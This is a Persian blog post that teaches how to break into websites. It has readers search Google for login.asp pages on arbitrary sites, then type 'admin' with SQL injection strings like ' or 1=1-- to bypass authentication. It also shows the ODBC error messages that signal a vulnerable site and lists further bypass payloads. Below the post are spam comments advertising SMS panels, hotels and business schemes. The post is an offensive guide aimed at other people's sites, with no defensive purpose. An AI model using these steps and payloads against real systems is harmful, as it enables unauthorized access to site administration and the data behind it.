هک سایت

          ارین 
            بازدید : 0
          سه شنبه 20 فروردین 1392
           نظرات (7)
        

هک کردن سایت با استفاده از گوگل و

SQL Injection

برای شروع کار ابتدا به گوگل بروید و در ان عبارت login.asp را سرچ کنید بعد حدود ۱۷ هزار سایت در گوگل به نمایش در می یاد که ادرس ان شبیه www.site.com/login.asp است حالا روی یکی از سایتها که همچنین ادرسی را دارند کلیک کرده تا وارد قسمت login سایت شوید بعد به جای username عبارت admin را تایپ کنید و به جای پسورد or 1=1— را تایپ کنید و login کنید ممکن است سیستم امنیتی سایت بالا نباشد در این صورت error می دهد این پیغام ظاهر می شود :

The page cannot be displayed

There is a problem with the page you are trying to reach and it cannot be displayed.

ALL ODBC Error Messages

Microsoft OLE DB Provider for ODBC drivers error

Microsoft OLE DB Provider for ODBC drivers error '80040e14 '

[Microsoft][ODBC SQL Server] Incorrect syntax near the keyword 'or'.

/verify .asp, line .

Microsoft OLE DB Provider for ODBC drivers error '80040e14 '

[Microsoft] [ODBC SQL Server] Unclosed quotation mark before the

character string

Microsoft OLE DB Provider for ODBC Drivers error '80004005 '

[Microsoft][ODBC Microsoft Access Driver]

Microsoft JET Database Engine error '80040e14 '

حالا می فهمیم که سایت اسیب پذیر است و می توان انرا هک کرد و وارد بخش مدیریت شد اما اگر با چنین پیغامی Login Failed مواجه شدید امنیت سایت بالا است و به این سادگی ها هک نمی شود

اینهم چندین کد برای حمله به SQL Injection ها :

Username:admin

Password:' or'=*

Username:admin " or "a"="a

Password:' or'='

ارسال نظر برای این مطلب

	این نظر توسط هر روز آخرین خبر استخدامی را برات اس ام اس میفرستیم در تاریخ 1393/10/09 و 4:10 دقیقه ارسال شده است

			سلام وقت بخیر اگه تمایل داری هر روز آخرین اخبار استخدامی شرکت ، سازمان های دولتی را دریافت کنی می تونی به لینک زیر جهت فعال سازی بری http://sms.mida-co.ir/newsletter/6/estekhtam

	این نظر توسط دریافت پنل رایگان به همراه خط اختصاصی با پیش شماره 50005 در تاریخ 1393/09/07 و 2:15 دقیقه ارسال شده است

			باسلام خدمت شما مدیر عزیز جهت ثبت نام پنل اس ام اس رایگان با همراه خط اختصاصی با پیش شماره 50005 می توانید به آدرس http://50005.mida-co.ir مراجعه نمائید. منتظر حضور گرمتون هستیم mida-co.ir

	این نظر توسط پیشنهاد یک کسب کار هوشمندانه در تاریخ 1393/08/26 و 1:25 دقیقه ارسال شده است

			با سلام خدمت شما این پیام احتمالا آینده ی تجاری شما را متحول خواهد کرد شما می توانید با حداقل سرمایه ی اولیه ، صاحب جامع ترین مرکز فروشگاهی و خدماتی شهرتان شوید جهت کسب اطلاعات بیشتر به وبسایت WWW.IBP24.ORG مراجعه نمایید

	این نظر توسط سامانه پیامک در تاریخ 1393/07/02 و 1:36 دقیقه ارسال شده است

			با سلام خدمت شما مدیر محترم شما می توانید با عضویت در طرح همکاری فروش پنل و خطوط پیامکی از بازدید کننده وبلاک خود درآمد کسب کنید ابتدا وارد آدرس زیر شوید و مراحل ثبت نام رو کامل نمائید http://sms.mida-co.ir/hamkar سپس وارد پنل کاربری شوید و از قسمت شبکه فروش و بازاریابی کد های مربوط به فروش پنل را در سایت خود قراردهید بعد از معرفی هر کاربر به شما 25 درصد سود فروش داده می شود جهت کسب اطلاعات بیشتر به سایت زیر مراجعه نمائید mida-co.ir info@mida-co.ir

	این نظر توسط سامانه پیامک در تاریخ 1393/04/20 و 3:57 دقیقه ارسال شده است

			با سلام خدمت شما مدیر محترم برای داشتن یک سامانه حرفه ای و رایگان همین حالا اقدام نمائید. سامانه sms5002.ir به شما یک پنل پیامک کاملا اختصاصی رایگان می دهد با این سامانه پنل ارتباطی جدیدی بین سایت و کاربران خود آغاز کنید. برای فعال سازی همین حالا اقدام نمائید. جهت ثبت نام به آدرس زیر مراجعه نمائید sms5002.ir/register.php

	این نظر توسط رزرو هتل با 50 درصد تخفیف در تاریخ 1392/02/25 و 15:59 دقیقه ارسال شده است

			رزرو هتل شیراز ، کیش ، قشم ، مشهد و تمام نقاط با 50 درصد تخفیف لینک رزرو هتل بشه به egardesh.com شماره تماس : 021-44151435 و 44155227-021 مشاهده اطلاعات بیشتر در www.egardesh.com سامانه رزرواسیون مهر راحت ، ارزان و با اطمینان خرید کنید